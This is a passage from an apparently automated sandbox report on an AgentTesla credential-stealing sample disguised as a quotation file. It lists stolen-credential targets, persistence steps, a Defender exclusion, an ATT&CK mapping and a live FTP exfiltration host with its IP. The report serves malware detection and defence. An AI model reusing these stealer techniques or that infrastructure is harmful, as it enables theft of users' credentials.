                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeFile opened: C:\FTP Navigator\Ftplist.txt
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: Yara matchFile source: 0.2.rQuotation3200025006.exe.377e4e0.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 22.2.sgxIb.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.rQuotation3200025006.exe.3741cc0.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.rQuotation3200025006.exe.377e4e0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.rQuotation3200025006.exe.3741cc0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000001C.00000002.4163218058.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000016.00000002.1961223046.0000000003241000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000016.00000002.1958682977.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.4164492788.0000000003501000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.4163306810.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1732806803.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: rQuotation3200025006.exe PID: 6744, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: rQuotation3200025006.exe PID: 2756, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: pBBqGOzrz.exe PID: 7616, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: sgxIb.exe PID: 8012, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: sgxIb.exe PID: 7188, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 0.2.rQuotation3200025006.exe.377e4e0.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 22.2.sgxIb.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.rQuotation3200025006.exe.3741cc0.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.rQuotation3200025006.exe.377e4e0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.rQuotation3200025006.exe.3741cc0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000001C.00000002.4163218058.00000000033DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.4163218058.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.4164492788.000000000354A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.4163306810.0000000002CDC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000016.00000002.1961223046.0000000003241000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000016.00000002.1958682977.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.4164492788.0000000003501000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000016.00000002.1961223046.000000000326C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.4163306810.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1732806803.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: rQuotation3200025006.exe PID: 6744, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: rQuotation3200025006.exe PID: 2756, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: pBBqGOzrz.exe PID: 7616, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: sgxIb.exe PID: 8012, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: sgxIb.exe PID: 7188, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		11
                    Disable or Modify Tools                    		2
                    OS Credential Dumping                    		1
                    File and Directory Discovery                    		Remote Services11
                    Archive Collected Data                    		1
                    Ingress Tool Transfer                    		1
                    Exfiltration Over Alternative Protocol                    		Abuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Scheduled Task/Job                    		1
                    Scheduled Task/Job                    		112
                    Process Injection                    		1
                    Deobfuscate/Decode Files or Information                    		31
                    Input Capture                    		24
                    System Information Discovery                    		Remote Desktop Protocol2
                    Data from Local System                    		11
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAt1
                    Registry Run Keys / Startup Folder                    		1
                    Scheduled Task/Job                    		3
                    Obfuscated Files or Information                    		1
                    Credentials in Registry                    		1
                    Query Registry                    		SMB/Windows Admin Shares1
                    Email Collection                    		1
                    Non-Standard Port                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                    Registry Run Keys / Startup Folder                    		12
                    Software Packing                    		NTDS211
                    Security Software Discovery                    		Distributed Component Object Model31
                    Input Capture                    		2
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    DLL Side-Loading                    		LSA Secrets2
                    Process Discovery                    		SSH1
                    Clipboard Data                    		23
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Masquerading                    		Cached Domain Credentials141
                    Virtualization/Sandbox Evasion                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items141
                    Virtualization/Sandbox Evasion                    		DCSync1
                    Application Window Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job112
                    Process Injection                    		Proc Filesystem1
                    System Network Configuration Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                    Hidden Files and Directories                    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1520520 Sample: rQuotation3200025006.exe Startdate: 27/09/2024 Architecture: WINDOWS Score: 100 65 ftp.haliza.com.my 2->65 67 api.ipify.org 2->67 73 Suricata IDS alerts for network traffic 2->73 75 Found malware configuration 2->75 77 Malicious sample detected (through community Yara rule) 2->77 79 12 other signatures 2->79 8 rQuotation3200025006.exe 7 2->8         started        12 pBBqGOzrz.exe 2->12         started        14 sgxIb.exe 2->14         started        16 sgxIb.exe 2->16         started        signatures3 process4 file5 57 C:\Users\user\AppData\Roaming\pBBqGOzrz.exe, PE32 8->57 dropped 59 C:\Users\...\pBBqGOzrz.exe:Zone.Identifier, ASCII 8->59 dropped 61 C:\Users\user\AppData\Local\Temp\tmp3D2.tmp, XML 8->61 dropped 63 C:\Users\...\rQuotation3200025006.exe.log, ASCII 8->63 dropped 95 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 8->95 97 Contains functionality to register a low level keyboard hook 8->97 99 Uses schtasks.exe or at.exe to add and modify task schedules 8->99 101 Adds a directory exclusion to Windows Defender 8->101 18 rQuotation3200025006.exe 16 5 8->18         started        23 powershell.exe 23 8->23         started        33 2 other processes 8->33 103 Multi AV Scanner detection for dropped file 12->103 105 Machine Learning detection for dropped file 12->105 107 Injects a PE file into a foreign processes 12->107 25 pBBqGOzrz.exe 12->25         started        35 2 other processes 12->35 27 sgxIb.exe 14->27         started        37 4 other processes 14->37 29 sgxIb.exe 16->29         started        31 schtasks.exe 16->31         started        signatures6 process7 dnsIp8 69 ftp.haliza.com.my 110.4.45.197, 21, 49736, 49737 EXABYTES-AS-APExaBytesNetworkSdnBhdMY Malaysia 18->69 71 api.ipify.org 104.26.12.205, 443, 49733, 49740 CLOUDFLARENETUS United States 18->71 53 C:\Users\user\AppData\Roaming\...\sgxIb.exe, PE32 18->53 dropped 55 C:\Users\user\...\sgxIb.exe:Zone.Identifier, ASCII 18->55 dropped 81 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 18->81 83 Tries to steal Mail credentials (via file / registry access) 18->83 85 Hides that the sample has been downloaded from the Internet (zone.identifier) 18->85 87 Loading BitLocker PowerShell Module 23->87 39 conhost.exe 23->39         started        41 WmiPrvSE.exe 23->41         started        89 Tries to harvest and steal ftp login credentials 29->89 91 Tries to harvest and steal browser information (history, passwords, etc) 29->91 93 Installs a global keyboard hook 29->93 43 conhost.exe 31->43         started        45 conhost.exe 33->45         started        47 conhost.exe 33->47         started        49 conhost.exe 35->49         started        51 conhost.exe 37->51         started        file9 signatures10 process11

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    rQuotation3200025006.exe58%ReversingLabsByteCode-MSIL.Spyware.Negasteal
                    rQuotation3200025006.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\pBBqGOzrz.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\pBBqGOzrz.exe58%ReversingLabsByteCode-MSIL.Spyware.Negasteal
                    C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe58%ReversingLabsByteCode-MSIL.Spyware.Negasteal

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    https://api.ipify.org/0%URL Reputationsafe
                    http://www.fontbureau.com0%URL Reputationsafe
                    http://www.fontbureau.com/designersG0%URL Reputationsafe
                    http://www.fontbureau.com/designers/?0%URL Reputationsafe
                    http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                    https://account.dyn.com/0%URL Reputationsafe
                    http://www.fontbureau.com/designers?0%URL Reputationsafe
                    http://www.tiro.com0%URL Reputationsafe
                    http://www.fontbureau.com/designers0%URL Reputationsafe
                    http://www.goodfont.co.kr0%URL Reputationsafe
                    http://www.carterandcone.coml0%URL Reputationsafe
                    http://www.sajatypeworks.com0%URL Reputationsafe
                    http://www.typography.netD0%URL Reputationsafe
                    http://www.fontbureau.com/designers/cabarga.htmlN0%URL Reputationsafe
                    http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                    http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                    https://api.ipify.org0%URL Reputationsafe
                    http://www.founder.com.cn/cn0%URL Reputationsafe
                    http://www.fontbureau.com/designers/frere-user.html0%URL Reputationsafe
                    http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                    http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                    http://www.fontbureau.com/designers80%URL Reputationsafe
                    http://www.fonts.com0%URL Reputationsafe
                    http://www.sandoll.co.kr0%URL Reputationsafe
                    http://www.urwpp.deDPlease0%URL Reputationsafe
                    http://www.zhongyicts.com.cn0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    http://www.sakkal.com0%URL Reputationsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    api.ipify.org
                    		104.26.12.205
                    		truefalse
                      		unknown
                      ftp.haliza.com.my
                      		110.4.45.197
                      		truetrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://api.ipify.org/false
                        • URL Reputation: safe
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://www.apache.org/licenses/LICENSE-2.0rQuotation3200025006.exe, 00000000.00000002.1735923407.0000000006762000.00000004.00000800.00020000.00000000.sdmpfalse
                          		unknown
                          http://www.fontbureau.comrQuotation3200025006.exe, 00000000.00000002.1735923407.0000000006762000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.fontbureau.com/designersGrQuotation3200025006.exe, 00000000.00000002.1735923407.0000000006762000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.fontbureau.com/designers/?rQuotation3200025006.exe, 00000000.00000002.1735923407.0000000006762000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.founder.com.cn/cn/bTherQuotation3200025006.exe, 00000000.00000002.1735923407.0000000006762000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://account.dyn.com/rQuotation3200025006.exe, 00000000.00000002.1732806803.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000016.00000002.1958682977.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.fontbureau.com/designers?rQuotation3200025006.exe, 00000000.00000002.1735923407.0000000006762000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.tiro.comrQuotation3200025006.exe, 00000000.00000002.1735923407.0000000006762000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.fontbureau.com/designersrQuotation3200025006.exe, 00000000.00000002.1735923407.0000000006762000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.goodfont.co.krrQuotation3200025006.exe, 00000000.00000002.1735923407.0000000006762000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://api.ipify.org/trQuotation3200025006.exe, 00000008.00000002.4163306810.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, pBBqGOzrz.exe, 0000000E.00000002.4164492788.00000000034B1000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000016.00000002.1961223046.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 0000001C.00000002.4163218058.000000000336C000.00000004.00000800.00020000.00000000.sdmpfalse
                            		unknown
                            http://www.carterandcone.comlrQuotation3200025006.exe, 00000000.00000002.1735923407.0000000006762000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.sajatypeworks.comrQuotation3200025006.exe, 00000000.00000002.1735923407.0000000006762000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.typography.netDrQuotation3200025006.exe, 00000000.00000002.1735923407.0000000006762000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designers/cabarga.htmlNrQuotation3200025006.exe, 00000000.00000002.1735923407.0000000006762000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.founder.com.cn/cn/cTherQuotation3200025006.exe, 00000000.00000002.1735923407.0000000006762000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.galapagosdesign.com/staff/dennis.htmrQuotation3200025006.exe, 00000000.00000002.1735923407.0000000006762000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://api.ipify.orgrQuotation3200025006.exe, 00000000.00000002.1732806803.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, rQuotation3200025006.exe, 00000008.00000002.4163306810.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, pBBqGOzrz.exe, 0000000E.00000002.4164492788.00000000034B1000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000016.00000002.1958682977.0000000000402000.00000040.00000400.00020000.00000000.sdmp, sgxIb.exe, 00000016.00000002.1961223046.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 0000001C.00000002.4163218058.000000000336C000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.founder.com.cn/cnrQuotation3200025006.exe, 00000000.00000002.1735923407.0000000006762000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designers/frere-user.htmlrQuotation3200025006.exe, 00000000.00000002.1735923407.0000000006762000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://ftp.haliza.com.myrQuotation3200025006.exe, 00000008.00000002.4163306810.0000000002E28000.00000004.00000800.00020000.00000000.sdmp, rQuotation3200025006.exe, 00000008.00000002.4163306810.0000000002CDC000.00000004.00000800.00020000.00000000.sdmp, rQuotation3200025006.exe, 00000008.00000002.4163306810.0000000002D3B000.00000004.00000800.00020000.00000000.sdmp, rQuotation3200025006.exe, 00000008.00000002.4163306810.0000000002D9C000.00000004.00000800.00020000.00000000.sdmp, pBBqGOzrz.exe, 0000000E.00000002.4164492788.000000000354A000.00000004.00000800.00020000.00000000.sdmp, pBBqGOzrz.exe, 0000000E.00000002.4164492788.00000000035FF000.00000004.00000800.00020000.00000000.sdmp, pBBqGOzrz.exe, 0000000E.00000002.4164492788.00000000036EA000.00000004.00000800.00020000.00000000.sdmp, pBBqGOzrz.exe, 0000000E.00000002.4164492788.00000000036E5000.00000004.00000800.00020000.00000000.sdmp, pBBqGOzrz.exe, 0000000E.00000002.4164492788.0000000003634000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000016.00000002.1961223046.000000000326C000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 0000001C.00000002.4163218058.00000000036C7000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 0000001C.00000002.4163218058.00000000033DC000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 0000001C.00000002.4163218058.0000000003496000.00000004.00000800.00020000.00000000.sdmpfalse
                              		unknown
                              http://www.jiyu-kobo.co.jp/rQuotation3200025006.exe, 00000000.00000002.1735923407.0000000006762000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.galapagosdesign.com/DPleaserQuotation3200025006.exe, 00000000.00000002.1735923407.0000000006762000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.com/designers8rQuotation3200025006.exe, 00000000.00000002.1735923407.0000000006762000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.fonts.comrQuotation3200025006.exe, 00000000.00000002.1735923407.0000000006762000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.sandoll.co.krrQuotation3200025006.exe, 00000000.00000002.1735923407.0000000006762000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.urwpp.deDPleaserQuotation3200025006.exe, 00000000.00000002.1735923407.0000000006762000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.zhongyicts.com.cnrQuotation3200025006.exe, 00000000.00000002.1735923407.0000000006762000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namerQuotation3200025006.exe, 00000000.00000002.1732045998.0000000002701000.00000004.00000800.00020000.00000000.sdmp, rQuotation3200025006.exe, 00000008.00000002.4163306810.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, pBBqGOzrz.exe, 00000009.00000002.1841537852.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, pBBqGOzrz.exe, 0000000E.00000002.4164492788.00000000034B1000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000010.00000002.1901166814.0000000002521000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000016.00000002.1961223046.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000019.00000002.1979059945.0000000002F24000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 0000001C.00000002.4163218058.000000000336C000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.sakkal.comrQuotation3200025006.exe, 00000000.00000002.1735717457.0000000005030000.00000004.00000020.00020000.00000000.sdmp, rQuotation3200025006.exe, 00000000.00000002.1735923407.0000000006762000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              104.26.12.205
                              		api.ipify.orgUnited States
                              		13335CLOUDFLARENETUSfalse
                              110.4.45.197
                              		ftp.haliza.com.myMalaysia
                              		46015EXABYTES-AS-APExaBytesNetworkSdnBhdMYtrue

                              General Information

                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1520520
                              Start date and time:2024-09-27 13:09:05 +02:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 11m 17s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:30
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:rQuotation3200025006.exe
                              Detection:MAL
                              Classification:mal100.troj.spyw.evad.winEXE@39/20@2/2
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 99%
                              • Number of executed functions: 415
                              • Number of non-executed functions: 30
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Override analysis time to 240000 for current running targets taking high CPU consumption

                              Warnings

                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size exceeded maximum capacity and may have missing disassembly code.
                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                              • Report size getting too big, too many NtCreateKey calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                              • VT rate limit hit for: rQuotation3200025006.exe

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              07:09:58API Interceptor6782479x Sleep call for process: rQuotation3200025006.exe modified
                              07:10:01API Interceptor74x Sleep call for process: powershell.exe modified
                              07:10:04API Interceptor1539219x Sleep call for process: pBBqGOzrz.exe modified
                              07:10:17API Interceptor5531601x Sleep call for process: sgxIb.exe modified
                              12:10:03Task SchedulerRun new task: pBBqGOzrz path: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe
                              12:10:08AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run sgxIb C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                              12:10:16AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run sgxIb C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              104.26.12.205file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                              • api.ipify.org/
                              file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                              • api.ipify.org/
                              file.exeGet hashmaliciousUnknownBrowse
                              • api.ipify.org/
                              file.exeGet hashmaliciousLummaC, VidarBrowse
                              • api.ipify.org/
                              SecuriteInfo.com.Win64.Evo-gen.13899.14592.exeGet hashmaliciousUnknownBrowse
                              • api.ipify.org/
                              file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                              • api.ipify.org/
                              file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                              • api.ipify.org/
                              file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                              • api.ipify.org/
                              file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                              • api.ipify.org/
                              file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                              • api.ipify.org/
                              110.4.45.197z38PO_20248099-1_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                z64MT103_126021720924_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                  rPO_20248099-112,300PCS.exeGet hashmaliciousAgentTeslaBrowse
                                    PO__20248099-1 12,300PCS.exeGet hashmaliciousAgentTeslaBrowse

                                      Domains

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      api.ipify.orgmSLEwIfTGL.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                      • 172.67.74.152
                                      RTGS-WB-ABS-240730-NEW.lnkGet hashmaliciousAgentTeslaBrowse
                                      • 172.67.74.152
                                      Purchase order.exeGet hashmaliciousAgentTeslaBrowse
                                      • 172.67.74.152
